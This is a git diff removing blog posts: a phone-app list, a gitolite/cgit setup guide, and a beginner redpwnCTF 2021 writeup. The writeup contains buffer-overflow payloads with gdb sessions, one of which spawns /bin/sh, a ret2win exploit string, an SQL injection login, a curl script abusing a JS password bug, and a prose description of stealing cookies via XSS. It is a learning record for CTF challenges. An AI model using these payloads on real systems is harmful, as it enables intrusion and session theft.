[cgit](https://git.zx2c4.com/cgit/about/) server to host my git -repositories on , and I use -[gitolite](https://gitolite.com/gitolite/) for ssh git push access. Cgit is -very easy to set up, and I like it very much. Gitolite on the other hand is a -pain in the ass to set up, because the documentation is not that great. If -you're planning on using gitolite on your own server, set the umask in -`~/.gitolite.rc` of your server's git account to `0022`. - -### SFTP - -I have two semi-public sftp accounts set up on my server: `media` and `sftp`. -`sftp` is for generic file sharing, and `media` is for my media. Both accounts -have tty login disabled and are chroot-jailed to /var/media and /var/sftp. - -## Phone apps - -These are the apps that I use on my phone. I recently upgraded my 2017 Nokia 6 -to a Google Pixel 4a (sunfish). It's a great phone! You can root it or flash -custom rom's very easily, and it gave me new appreciation for the basic -features of a smartphone. The Pixel 4a has really good haptics. They're almost -iPhone level, though I won't be using iPhones any time soon. - -I flashed [CalyxOS](https://calyxos.org/) as soon as it was 5 minutes out of -the box, but ended up not liking it because of it's nonexistant root support. -I'm currently using [LineageOS](https://lineageos.org/) 18.1, rooted using -[magisk](https://github.com/topjohnwu/Magisk). - -### Open source - -- **One-time password generator**: [andotp](https://github.com/andOTP/andOTP) - -- **App store**: [aurora store](https://gitlab.com/AuroraOSS/AuroraStore). This - app works better when you're rooted, but it's way better than the google play - store. - -- **App store**: [aurora f-droid](https://gitlab.com/AuroraOSS/auroradroid) - -- **Password manager**: [bitwarden](https://github.com/bitwarden/mobile) - -- **Browser**: [bromite](https://www.bromite.org/). This is basically ungoogled - chromium but for mobile. - -- **Calendar**: [etar](https://github.com/Etar-Group/Etar-Calendar) - -- [etesync](https://github.com/etesync/android) - -- **File browser**: [material - files](https://github.com/zhanghai/MaterialFiles). It looks sexy, it's free, - it's awesome. - -- **Email client**: [k-9](https://k9mail.app/). - -- **Maps**: [osmand](https://osmand.net/). - -- **Music player**: [shuttle](https://www.shuttlemusicplayer.com/). It looks - sexy, it's free, it's awesome. - -- **Instant messenger**: [signal](https://signal.org/). [papa musk said - it](https://twitter.com/elonmusk/status/1347165127036977153). - -- **Manga reader**: [tachiyomi](https://tachiyomi.org/) - -- **To-do lists**: [tasks.org](https://tasks.org/). This is easily the best - to-do app I've ever used, and it integrated very well with etesync. - - If you're cheap (like me), you can get 'free' pro by downloading this app - through f-droid instead of the play store. It's still nice to donate. - -- **Smart home control**: [home assistant](https://www.home-assistant.io/). - [the whole spiel](/post/homeauto). - -- **Notes**: [leaflet](https://github.com/PotatoProject/Leaflet). It's - basically Google Keep but open source and without Google. It's part of the - PotatoProject which is a custom Android rom, and there were plans for an open - source notes sync server that you could host yourself, but I haven't seen - that pop up yet. - - The app is written in Flutter, and did have choppy scrolling animations on my - old phone. I'm not sure if that was a bug or my old phone just being - underpowered, but it's something I want to mention anyways. - -- **Weather**: [geometric - weather](https://f-droid.org/en/packages/wangdaye.com.geometricweather/). - It's really good. Good animations, live wallpaper, fast, etc. - -- **RSS Reader**: [tiny tiny - rss](https://www.f-droid.org/en/packages/org.fox.tttrss/). This app requires - that you host your own tiny tiny rss server, but I do and the app works - great! - -- **Myanimelist client**: [moelist](https://github.com/axiel7/MoeList). I don't - know how I found this app but it's a real gem. If you use MAL you should - download this app. - -- **PDF reader**: [pdf viewer - plus](https://f-droid.org/en/packages/com.gsnathan.pdfviewer/). This is the - only one that's actually decent. Good UI, good UX, pretty fast rendering. - 9/10 - -### Requires root - -- **Ad-blocker**: [adaway](https://adaway.org/). It does have a rootless mode, - though the app warns you that it's slower and impacts your battery life - negatively. - -- **Theme engine**: [substratum](https://github.com/substratum/substratum). - Substratum requires root on android 9+, unless you're on stock samsung (one - ui). Android 8 and under users can buy - [andromeda](https://play.google.com/store/apps/details?id=projekt.andromeda). - Samsung users can buy - [synergy](https://play.google.com/store/apps/details?id=projekt.samsung.theme.compiler). - They're both developed by the same people behind substratum, but they're not - open source. - -### Closed source - -- **Reddit client**: - [sync](https://play.google.com/store/apps/details?id=com.laurencedawson.reddit_sync) - diff --git a/_posts/2021-04-24-connect4.md b/_posts/2021-04-24-connect4.md deleted file mode 100644 index 6c5c329..0000000 --- a/_posts/2021-04-24-connect4.md +++ /dev/null @@ -1,18 +0,0 @@ ---- -title: Connect 4 beta live! -tags: - - connect 4 - - beta -cover: /img/connectfourbeta.png ---- - -My connect four website is currently online as a public beta. You can visit the -website at . A list of known bugs is on the -homepage, and all other issues should be submitted to -[GitHub](https://github.com/lonkaars/connect-4/issues). - -If I encounter some very interesing bug that I think deserves it's own blog -post I'll write one about it of course. I have one more week from now to worry -about the connect four website, but after that I'm going to start preparing for -my school exams. - diff --git a/_posts/2021-04-28-git.md b/_posts/2021-04-28-git.md deleted file mode 100644 index 48de24b..0000000 --- a/_posts/2021-04-28-git.md +++ /dev/null @@ -1,164 +0,0 @@ ---- -title: My git setup -subtitle: How I use git on my server -tags: - - git - - server - - software -cover: /img/git.png ---- - -## Overview - -I have two mechanisms set up for accessing my git server. I use gitolite for -ssh access and permission management. I also have cgit set up which generates -html pages for viewing your repositories and also hosts your repositories over -http, or https if you have it set up. - -## SSH Access with gitolite - -Gitolite was a pain in the ass to set up because I didn't understand umasks -before I started trying to set it up. A *umask* is like the opposite of what -you'd enter when running `chmod`. For example: if I run `touch test`, I will -now have a file with the same permissions as `chmod 644`. That looks something -like this: - -```sh -$ touch test -$ ls -l -total bla bla --rw-r--r-- 1 loek users 0 Apr 28 12:28 test -$ chmod 644 test -$ ls -l -total bla bla --rw-r--r-- 1 loek users 0 Apr 28 12:28 test -$ # notice the same permissions on the 'test' file -``` - -If I want gitolite to create repositories with default permissions so other -users can read the repositories, I have to set my umask to the opposite of 644. -Here's a quick explanation of `ls -l`'s output: - -```sh --rw-r--r-- * user group size date time filename -|└┬┘└┬┘└┬┘ -| | | └all users -| | └owner group -| └owner user -└type -``` - -Each digit in a `chmod` command sets the permission for the file owner, file -group, then everyone. That looks something like this: - -```sh -$ chmod 644 test - -decimal: 6 4 4 -binary: 110 100 100 -ls -l: - rw- r-- r-- -``` - -Then we take the opposite of this to get the umask: - -```sh -$ chmod 755 directory -R - -ls -l: d rwx r-x r-x -binary: 000 010 010 -decimal: 0 2 2 -``` - -And now my `.gitolite.rc`: - -```perl -%RC = ( - UMASK => 0022, - ROLES => { - READERS => 1, - WRITERS => 1, - }, - - ENABLE => [ - 'ssh-authkeys', - 'git-config', - 'daemon', - 'gitweb', - ], -); - -1; -``` - -## HTTP(S) Access with cgit - -Cgit is probably the easiest thing to set up. It has great built-in -documentation (`man 5 cgitrc`). Pretty much all configuration is in -`/etc/cgitrc` (css/syntax highlighting isn't in there). The only reason I'm -posting my config here is because for some reason, the order of the options in -cgit's config matters: - -```rc -# -# cgit config -# see cgitrc(5) for details - -cache-size=0 -enable-commit-graph=1 - -css=/cgit.css -logo=/cgit.png - -virtual-root=/ -remove-suffix=1 - -root-title=git :tada: - -## -## List of common mimetypes -## -mimetype.gif=image/gif -mimetype.html=text/html -mimetype.jpg=image/jpeg -mimetype.jpeg=image/jpeg -mimetype.pdf=application/pdf -mimetype.png=image/png -mimetype.svg=image/svg+xml - -# Highlight source code with python pygments-based highlighter -source-filter=/usr/lib/cgit/filters/syntax-highlighting.py - -# Format markdown, restructuredtext, manpages, text files, and html files -# through the right converters -about-filter=/usr/lib/cgit/filters/about-formatting.sh - -## -## Search for these files in the root of the default branch of repositories -## for coming up with the about page: -## -readme=:README.md -readme=:readme.md -readme=:README.rst -readme=:readme.rst -readme=:README.txt -readme=:readme.txt -readme=:README -readme=:readme -readme=:INSTALL.md -readme=:install.md -readme=:INSTALL.mkd -readme=:install.mkd -readme=:INSTALL.rst -readme=:install.rst -readme=:INSTALL.html -readme=:install.html -readme=:INSTALL.htm -readme=:install.htm -readme=:INSTALL.txt -readme=:install.txt -readme=:INSTALL -readme=:install - -scan-path=/mnt/scf/git/repositories -``` - diff --git a/_posts/2021-07-13-redpwn2021.md b/_posts/2021-07-13-redpwn2021.md deleted file mode 100644 index df9da29..0000000 --- a/_posts/2021-07-13-redpwn2021.md +++ /dev/null @@ -1,778 +0,0 @@ ---- -title: redpwnCTF 2021 -subtitle: A noob's perspective -tags: - - hacking - - CTF - - writeup -cover: /img/redpwn2021.png ---- - -This is the first 'real' CTF I've participated in. About two weeks ago, a -friend of mine was stuck on some challenges from the Radboud CTF. This was a -closed CTF more geared towards beginners (high school students), and only had a -few challenges which required deeper technical knowledge of web servers and -programming. Willem solved most of the challenges, and I helped solve 3 more. - -Apart from those challenges, basically all my hacking knowledge comes from -computerphile videos, liveoverflow videos and making applications myself. - -> epic announcement!!! -> -> Willem has added explanations of the challenges he solved, so go read them! - -## Challenges - -### web/pastebin-1 - -This challenge is a simple XSS exploit. The website that's vulnerable is -supposed to be a clone of pastebin. I can enter any text into the paste area, -and it will get inserted as HTML code into the website when someone visits the -generated link. - -The challenge has two sites: one with the pastebin clone, and one that visits -any pastebin url as the website administrator. The goal of this challenge is -given by it's description: - -> Ah, the classic pastebin. Can you get the admin's cookies? - -In JS, you can read all cookies without the `HttpOnly` attribute by reading -`document.cookie`. This allows us to read the cookies from the admin's browser, -but now we have to figure out a way to get them sent back to us. - -Luckily, there's a free service called [hookbin](https://hookbin.com/) that -gives you an http endpoint to send anything to, and look at the request -details. - -Combining these two a simple paste can be created: - -```html - -``` - -### crypto/scissor - -I wasn't planning on including this one, but it makes use of the excellent -[CyberChef](https://gchq.github.io/CyberChef/) tool. The flag is given in the -challenge description, and is encrypted using a ceasar/rot13 cipher. A simple -python implementation of this cipher is included with the challenge, but I just -put it into CyberChef and started trying different offsets. - -### rev/wstrings - -> Some strings are wider than normal... - -This challenge has a binary that uses a simple `strcmp` to check the flag. When -running the program, the following output is visible: - -```sh -# ./wstrings -Welcome to flag checker 1.0. -Give me a flag> -``` - -My first stategy was running the `strings` utility on the `wstrings` binary, -but I didn't find the flag. What was interesting to me though was that I also -couldn't find the prompt text... This immediately made me check for other -string encodings. - -Running the `strings` utility with the `-eL` flag tells `strings` to look for -32-bit little-endian encoded strings, and lo and behold the flag shows up! - -This is because ascii strings are less 'wide' than 32-bit strings: - -``` - --- ascii --- - -hex -> 0x68 0x65 0x6c 0x6c 0x6f -str -> h e l l o -``` - -Notice how each character is represented by a single byte each (8 bits) in -ascii, as opposed to 32-bit characters in 32-bit land. - -``` - --- 32-bit land --- - -hex -> 0x00000068 0x00000065 0x0000006c 0x0000006c 0x0000006f -str -> h e l l o -``` - -I think 32-bit strings also have practical use for things like non-English -texts such as Hebrew, Chinese or Japanese. Those characters take up more space -anyways, and you would waste less space by not using unicode escape characters. - -### web/secure - -> Just learned about encryption—now, my website is unhackable! - -This challenge is pretty simple if you know some of JS's quirks. Right at the -top of the file is an sqlite3 expression in JS: - -```js -//////// -db.exec(`INSERT INTO users (username, password) VALUES ( - '${btoa('admin')}', - '${btoa(crypto.randomUUID)}' -)`); -``` - -This section of code immediately jumped out to me because I noticed that -`crypto.randomUUID` wasn't actually being called. - -Because the 'random uuid' is being fed into `btoa()` it becomes a base64 -encoded string. However, `btoa()` also expects a string as input. Because every -object in JS has a `.toString()` method, when you pass it into a function -expecting another type, JS will happily convert it for you without warning. - -This means that the admin's password will always be a base64-encoded version of -`crypto.randomUUID`'s source code. We can get that base64-encoded source code -by running the following in a NodeJS REPL: - -```js -// import file system and crypto modules -var writeFileSync = require('fs').writeFileSync; -var crypto = require('crypto'); - -// write source to file -writeFileSync('./randomUUID.js', btoa(crypto.randomUUID.toString()), 'utf-8'); -``` - -I made a simple shell script that calls cURL with the base64-encoded -parameters, and decodes the url-encoded flag afterwards: - -```sh -#!/bin/sh - -# https://stackoverflow.com/questions/6250698/how-to-decode-url-encoded-string-in-shell -function urldecode() { : "${*//+/ }"; echo -e "${_//%/\\x}"; } - -urldecode $(curl -sX POST \ - -d "username=$(printf 'admin' | base64)" \ - -d "password=$(cat ./randomUUID.js)" \ - https://secure.mc.ax/login) -``` - -### crypto/baby - -> I want to do an RSA! - -This challenge is breaking RSA. It only works because the `n` parameter is -really small. - -Googling for 'rsa decrypt n e c' yields -[this](https://stackoverflow.com/questions/49878381/rsa-decryption-using-only-n-e-and-c) -stackoverflow result, which links to -[dcode.fr](https://www.dcode.fr/rsa-cipher). The only thing left to do is -calculate `p` and `q`, which can be done using [wolfram -alpha](https://wolframalpha.com/). - -### pwn/beginner-generic-pwn-number-0 - -> rob keeps making me write beginner pwn! i'll show him... -> -> `nc mc.ax 31199` - -This was my first interaction with `gdb`. It was.. painful. After begging for -help in the redpwnCTF discord server about another waaaay harder challenge, an -organizer named asphyxia pointed me towards [gef](https://github.com/hugsy/gef) -which single-handedly saved my sanity during the binary exploitation -challenges. - -The first thing I did was use [iaito](https://github.com/radareorg/iaito) to -look at a disassembly graph of the binary. Iaito is a graphical front-end to -the radare2 reverse engineering framework, and I didn't feel like learning two -things at the same time, so that's why I used it. While it's very -user-friendly, I didn't look into reverse engineering tools very much, and -didn't realise that iaito is still in development. Let's just say I ran into -some issues with project saving so I took lots of unnecessary repeated steps. - -After trying to make sense of assembly code after just seeing it for the first -time, I instead decided looking at the source code would be a better idea since -I actually know c. - -```c -#include -#include -#include - -const char *inspirational_messages[] = { - "\"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨\"", - "\"𝘱𝘭𝘦𝘢𝘴𝘦 𝘸𝘳𝘪𝘵𝘦 𝘢 𝘱𝘸𝘯 𝘴𝘰𝘮𝘦𝘵𝘪𝘮𝘦 𝘵𝘩𝘪𝘴 𝘸𝘦𝘦𝘬\"", - "\"𝘮𝘰𝘳𝘦 𝘵𝘩𝘢𝘯 1 𝘸𝘦𝘦𝘬 𝘣𝘦𝘧𝘰𝘳𝘦 𝘵𝘩𝘦 𝘤𝘰𝘮𝘱𝘦𝘵𝘪𝘵𝘪𝘰𝘯\"", -}; - -int main(void) -{ - srand(time(0)); - long inspirational_message_index = rand() % (sizeof(inspirational_messages) / sizeof(char *)); - char heartfelt_message[32]; - - setbuf(stdout, NULL); - setbuf(stdin, NULL); - setbuf(stderr, NULL); - - puts(inspirational_messages[inspirational_message_index]); - puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!"); - puts("can you write me a heartfelt message to cheer me up? :("); - - gets(heartfelt_message); - - if(inspirational_message_index == -1) { - system("/bin/sh"); - } -} -``` - -After looking at this source things became a lot clearer, because the only -input you can actually control is received from `gets(...);` - -Now comes the hard part: doing it, but in assembly! - -Some resources you should consume before attempting binary exploitation would -be [computerphile's video on buffer -overflows](https://www.youtube.com/watch?v=1S0aBV-Waeo) and -[cheat.sh/gdb](https://cheat.sh/gdb) for some basic gdb commands. The rest of -this section assumes you know the basics of both buffer overflows and gdb. - -First, let's print a disassembly of the `int main()` function: - -``` -(gdb) disas main -Dump of assembler code for function main: - 0x000000000040127c <+134>: call 0x4010a0 - 0x0000000000401281 <+139>: lea rdi,[rip+0xec8] # 0x402150 - 0x0000000000401288 <+146>: call 0x4010a0 - 0x000000000040128d <+151>: lea rdi,[rip+0xf1c] # 0x4021b0 - 0x0000000000401294 <+158>: call 0x4010a0 - 0x0000000000401299 <+163>: lea rax,[rbp-0x30] - 0x000000000040129d <+167>: mov rdi,rax - 0x00000000004012a0 <+170>: call 0x4010f0 - 0x00000000004012a5 <+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff - 0x00000000004012aa <+180>: jne 0x4012b8 - 0x00000000004012ac <+182>: lea rdi,[rip+0xf35] # 0x4021e8 - 0x00000000004012b3 <+189>: call 0x4010c0 - 0x00000000004012b8 <+194>: mov eax,0x0 - 0x00000000004012bd <+199>: leave - 0x00000000004012be <+200>: ret -End of assembler dump. -``` - -This isn't the full output from gdb, but only the last few lines. A few things -should immediately stand out: the 3 `` calls, and right after the -call to ``. These are the assembly equivalent of: - -```c -puts(inspirational_messages[inspirational_message_index]); -puts("rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!"); -puts("can you write me a heartfelt message to cheer me up? :("); - -gets(heartfelt_message); -``` - -Since I didn't see any reference to a flag file being read, I assumed that the -`system("/bin/sh")` call is our main target, so let's see if we can find that -in our assembly code. There's a call to `` at ``, and -there's other weird `cmp`, `jne` and `lea` instructions before. Let's figure -out what those do! - -After some stackoverflow soul searching, I found out that the `cmp` and `jne` -are assembly instructions for compare, and jump-if-not-equal. They work like -this: - -```asm6502 -; cmp compares what's in the $rbp register to 0xffffffffffffffff -; and turns on the ZERO flag if they're equal - 0x004012a5 <+0>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff - -; jne checks if the ZERO flag is on, -; and if it is it jumps (in this case) to 0x4012b8 -┌--0x004012aa <+1>: jne 0x4012b8 -│; we can safely ignore the `lea` instruction as it doesn't impact our pwn -│ 0x004012ac <+2>: lea rdi,[rip+0xf35] # 0x4021e8 -│ -│; the almighty syscall -│ 0x004012b3 <+3>: call 0x4010c0 -│ -│; from here on the program exits without calling /bin/sh -└->0x004012b8 <+4>: mov eax,0x0 - 0x004012bd <+5>: leave - 0x004012be <+6>: ret -``` - -The program checks if there's `0xffffffffffffffff` in memory `0x8` bytes before -the `$rbp` register. The program allocates 32 bytes of memory for our heartfelt -message, but it continues reading even if our heartfelt message is longer than -32 bytes. Let's see if we can overwrite that register >:) - -Let's set a breakpoint after the `` call in gdb, and run the program -with 40 bytes of `0x61` ('a') - -``` -(gdb) break *0x00000000004012a5 -Breakpoint 1 at 0x4012a5 - -(gdb) run < <(python3 -c "print('a' * 40)") -``` - -I'm using the `run` command with `<` and `<()` to pipe the output of python -into the program's `stdin`. It's unnecessary at this stage because there's an -'a' key on my keyboard, but if we were to send raw bytes, this would make it a -lot easier. - -I'm also using [gef](https://github.com/hugsy/gef) so I get access to a command -called `context` which prints all sorts of information about registers, the -stack and a small disassembly window. I won't show it's output here, but it -was an indispensable tool that you should install nonetheless. - -Let's print the memory at `[$rbp - 0x8]`: - -``` -(gdb) x/8gx $rbp - 0x8 -0x7fffffffd758: 0x0000000000000000 0x0000000000000000 -0x7fffffffd768: 0x00007ffff7de4b25 0x00007fffffffd858 -0x7fffffffd778: 0x0000000100000064 0x00000000004011f6 -0x7fffffffd788: 0x0000000000001000 0x00000000004012c0 -``` - -Hmmm, no overwriteage yet. Let's try 56 bytes instead: - -``` -(gdb) run < <(python3 -c "print('a' * 56)") -(gdb) x/8gx $rbp - 0x8 -0x7fffffffd758: 0x6161616161616161 0x6161616161616161 -0x7fffffffd768: 0x00007ffff7de4b00 0x00007fffffffd858 -0x7fffffffd778: 0x0000000100000064 0x00000000004011f6 -0x7fffffffd788: 0x0000000000001000 0x00000000004012c0 -(gdb) x/1gx $rbp - 0x8 -0x7fffffffd758: 0x6161616161616161 -``` - -Jackpot! We've overwritten 16 bytes of the address that the `cmp` instruction -reads. Let's try setting it to `0xff` instead, so we get a shell. Python 3 is -not that great for binary exploitation, so the code for this is a little bit -ugly, but if it works, it works! - -``` -(gdb) run < <(python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)") -(gdb) x/1gx $rbp - 0x8 -0x7fffffffd758: 0xffffffffffffffff -``` - -Now let's let execution continue as normal by using the `continue` command: - -``` -(gdb) continue -Continuing. -[Detaching after vfork from child process 22950] -[Inferior 1 (process 22947) exited normally] -``` - -This might seem underwhelming, but our explit works! A child process was -spawned, and as a bonus, we didn't get any segmentation faults! The reason we -don't get an interactive shell is because we used python to pipe input into the -program which makes it non-interactive. - -At this point I was about 12 hours in of straight gdb hell, and I was very -happy to see this shell. After discovering this, I immediately tried it outside -the debugger and was dissapointed to see that my exploit didn't work. After a -small panick attack I found out this was because of my environment variables. -You can launch an environment-less shell by using the `env -i sh` command: - -``` -λ generic → λ git master* → env -i sh -sh-5.1$ python3 -c "import sys; sys.stdout.buffer.write(b'a' * 40 + b'\xff' * 8)" | ./beginner-generic-pwn-number-0 -"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨" -rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self! -can you write me a heartfelt message to cheer me up? :( -sh-5.1$ # another shell :tada: -``` - -Now it was time to actually do the exploit on the remote server. - -I whipped up the most disgusting and janky python code that I won't go into -detail about, but here's what is does (in short): - -1. Create a thread to capture data from the server and forward it to `stdout` -2. Capture user commands using `input()` and decide what to do with them on the main thread - -The code for this script can be found -[here](https://github.com/lonkaars/redpwn/blob/master/challenges/generic/pwn.py), -though be warned, it's _very_ janky and you're probably better off copying -stuff from stackoverflow. Writing your own tools is more fun though, and might -also be faster than trying to wrestle with existing tools to try to get them to -do exactly what you want them to do. In this case I could've also just used [a -simple -command](https://reverseengineering.stackexchange.com/questions/13928/managing-inputs-for-payload-injection?noredirect=1&lq=1). - -It did help me though and I actually had to copy it for use in the other buffer -overflow challenge that I solved, so I'll probably refactor it someday for use -in other CTFs. - -### crypto/round-the-bases - -This crypto challenge uses a text file with some hidden information. If you -open up the file in a text editor, and adjust your window width, you'll -eventually see the repeating pattern line up. This makes it very easy to see -what part of the pattern is actually changing: - -``` -----------------------xxxx---- -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:K0o09mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -[9km7D9mTfc:..Zt9mTZ_:IIcu9mTN -``` - -I wrote a simple python script to parse this into binary data, and it worked on -the first try: - -```py -# read the file into a string -file = open("./round-the-bases") -content = file.read() -file.close() - -# split on every 30th character into a list -n = 30 -arr = [ content[i : i + n] for i in range(0, len(content), n) ] - -bin = [] -for line in arr: - sub = line[16:20] # the part that changes - if sub == 'IIcu': # IIcu -> 0x0 - bin.append('0') - else: # K0o0 -> 0x1 - bin.append('1') - -bin = ''.join(bin) # join all the list indices together into a string - -# decode the binary string into ascii characters -for i in range(0, len(bin), 8): - print(chr(int(bin[i:i+8], 2)), end='') - -# newline for good measure -print("\n", end='') -``` - -### pwn/ret2generic-flag-reader - -This was the second binary exploitation challenge I tackled, and it went much -better than the first because I (sort of) knew what I was doing by now. - -I figured the 'ret2' part of the title challenge was short for 'return to', and -my suspicion was confirmed after looking at the c source: - -```c -#include -#include -#include - -void super_generic_flag_reading_function_please_ret_to_me() -{ - char flag[0x100] = {0}; - FILE *fp = fopen("./flag.txt", "r"); - if (!fp) - { - puts("no flag!! contact a member of rob inc"); - exit(-1); - } - fgets(flag, 0xff, fp); - puts(flag); - fclose(fp); -} - -int main(void) -{ - char comments_and_concerns[32]; - - setbuf(stdout, NULL); - setbuf(stdin, NULL); - setbuf(stderr, NULL); - - puts("alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable..."); - puts("how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!"); - puts("slap on some flavortext and there's no way rob will fire me now!"); - puts("this is genius!! what do you think?"); - - gets(comments_and_concerns); -} - -``` - -With my newfound knowledge of binary exploitation, I figured I would have to -overwrite the return pointer on the stack somehow, so the program calls the -`super_generic_flag_reading_function_please_ret_to_me` function that isn't -called at all in the original. - -The only input we have control over is again a call to `gets();` - -Let's look at the disassembly in gdb: - -``` -(gdb) disas main -Dump of assembler code for function main: - 0x00000000004013f4 <+79>: call 0x4010a0 - 0x00000000004013f9 <+84>: lea rdi,[rip+0xca0] # 0x4020a0 - 0x0000000000401400 <+91>: call 0x4010a0 - 0x0000000000401405 <+96>: lea rdi,[rip+0xd0c] # 0x402118 - 0x000000000040140c <+103>: call 0x4010a0 - 0x0000000000401411 <+108>: lea rdi,[rip+0xd48] # 0x402160 - 0x0000000000401418 <+115>: call 0x4010a0 - 0x000000000040141d <+120>: lea rax,[rbp-0x20] - 0x0000000000401421 <+124>: mov rdi,rax - 0x0000000000401424 <+127>: call 0x4010e0 - 0x0000000000401429 <+132>: mov eax,0x0 - 0x000000000040142e <+137>: leave - 0x000000000040142f <+138>: ret -End of assembler dump. -``` - -We see again multiple calls to `` and right after a call to -``. There is no `cmp` and `jne` to be found in this challenge though. - -The goal is to overwrite the _return address_. This is a memory address also -stored in memory, and the program will move execution to that memory address -once it sees a `ret` instruction. In this 'vanilla' state, the return address -always goes to the assembly equivalent of an `exit()` function. Let's see if we -can overwrite it by giving too much input: - -``` -(gdb) break *0x000000000040142f -Breakpoint 1 at 0x40142f -(gdb) run < <(python3 -c "print('a' * 56)") --- Breakpoint 1 hit -- -(gdb) info registers -rax 0x0 0x0 -rbx 0x401430 0x401430 -rsi 0x7ffff7f7d883 0x7ffff7f7d883 -rdi 0x7ffff7f804e0 0x7ffff7f804e0 -rbp 0x6161616161616161 0x6161616161616161 -rsp 0x7fffffffd898 0x7fffffffd898 -rip 0x40142f 0x40142f -``` - -As you can see, the $rbp register is completely overwritten with `0x61`'s. -Let's check the $rsp register to see where the `main()` function tries to go -after `ret`: - -``` -(gdb) run -Starting program: ret2generic-flag-reader -alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... -how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! -slap on some flavortext and there's no way rob will fire me now! -this is genius!! what do you think? -a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 --- Breakpoint 1 hit -- -(gdb) x/1gx $rsp -0x7fffffffd898: 0x3363326331633063 -``` - -Let's use CyberChef to see what `0x3363326331633063` is in ascii! - -![](/img/redpwn2021/cyberchef1.png) - -Hmm, it's backwards. Let's reverse it! - -![](/img/redpwn2021/cyberchef2.png) - -Let's find the address of the super generic flag reading function with gdb. - -``` -(gdb) print super_generic_flag_reading_function_please_ret_to_me -$2 = {} 0x4011f6 -``` - -Now we're ready to craft a string that exploits the program and runs the secret -function! - -``` -a0a1a2a3a4a5a6a7a8a9b0b1b2b3b4b5b6b7b8b9c0c1c2c3 <- original - c0c1c2c3 <- ends up in $rsp -aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa <- padding ( 0x28 * 'a' ) - - c 0 c 1 c 2 c 3 <- ends up in $rsp - 3 c 2 c 1 c 0 c <- reverse -0x3363326331633063 <- reverse (hex) -0x00000000004011f6 <- pointer we want in $rsp - f611400000000000 <- reverse - \xf6\x11\x40\x00\x00\x00\x00\x00 <- python bytestring - -exploit string: -b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00' -``` - -Now let's try it in an environment-less shell: - -``` -python3 -c "import sys; sys.stdout.buffer.write(b'a' * 0x28 + b'\xf6\x11\x40\x00\x00\x00\x00\x00')" | ./ret2generic-flag-reader -alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable... -how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function! -slap on some flavortext and there's no way rob will fire me now! -this is genius!! what do you think? -flag{this_is_a_dummy_flag_go_solve_it_yourself} - -Segmentation fault (core dumped) -sh-5.1$ -``` - -### rev/bread-making - -For this challenge, I first tried using iaito again to do some program flow -analysis. After giving up on that, I decided to instead brute-force the correct -steps by hand. This was a very long and boring process. - -First I used `strings` again to extract all the dialogue and user input strings -from the binary. Then I filtered them to not include obvious dialogue, but only -the possible user input strings. And this is the correct path that gives the -flag: - -``` -add flour -add salt -add yeast -add water -hide the bowl inside a box -wait 3 hours -work in the basement -preheat the toaster oven -set a timer on your phone -watch the bread bake -pull the tray out with a towel -open the window -unplug the oven -unplug the fire alarm -wash the sink -clean the counters -flush the bread down the toilet -get ready to sleep -close the window -replace the fire alarm -brush teeth and go to bed -``` - -In hindsight I could've probably made a simple python script to brute force all -remaining possibilities until it got longer output from the program, but -laziness took over and I decided that spending 45 minutes doing very dull work -was more worth it instead. - -## Willem's part in the CTF - -Hi, Willem here. - -In this part I will talk about my experience during the CTF and The -collaboration between me and Loek. - -### web/orm-bad - -This was also my first CTF, just like Loek, because of this was quite uncertain -about my skill level. For example, I have no experience using Linux systems, -but from what I learned before the CTF it is quite essential. My fear of not -being able to do any of the challenges disappeared quickly after we had -completed the beginner challenges. With a simple sql injection I got my first -real flag: - -``` -username: admin';-- -password: -flag{this_is_a_dummy_flag_go_solve_it_yourself} -``` - -We had planned to use github's projects to track progress on challenges, but -when you're actually doing a challenge it's the last thing you think about. -So, we didn't really know who was doing which challenge, but because we're a -team of two this wasn't a big problem. - -The most challenge were a bit to hard for me. Some I would get pretty far, but -needed Loek's help to solve it. Others I didn't even attempt to begin on. - -### misc/the-substitution-game - -One challenge I spend a lot of time on was __The substitution game__. In the -substitution game you had to substitute certain parts of the input string to -get the desired output string. I got to level for of 6. Level 1 and 2 to were -really simple, but at level 3 you started to need to really understand the -game. - -``` -level 3: -initial: aaaaaaaaaaaaaa (the amount of a's 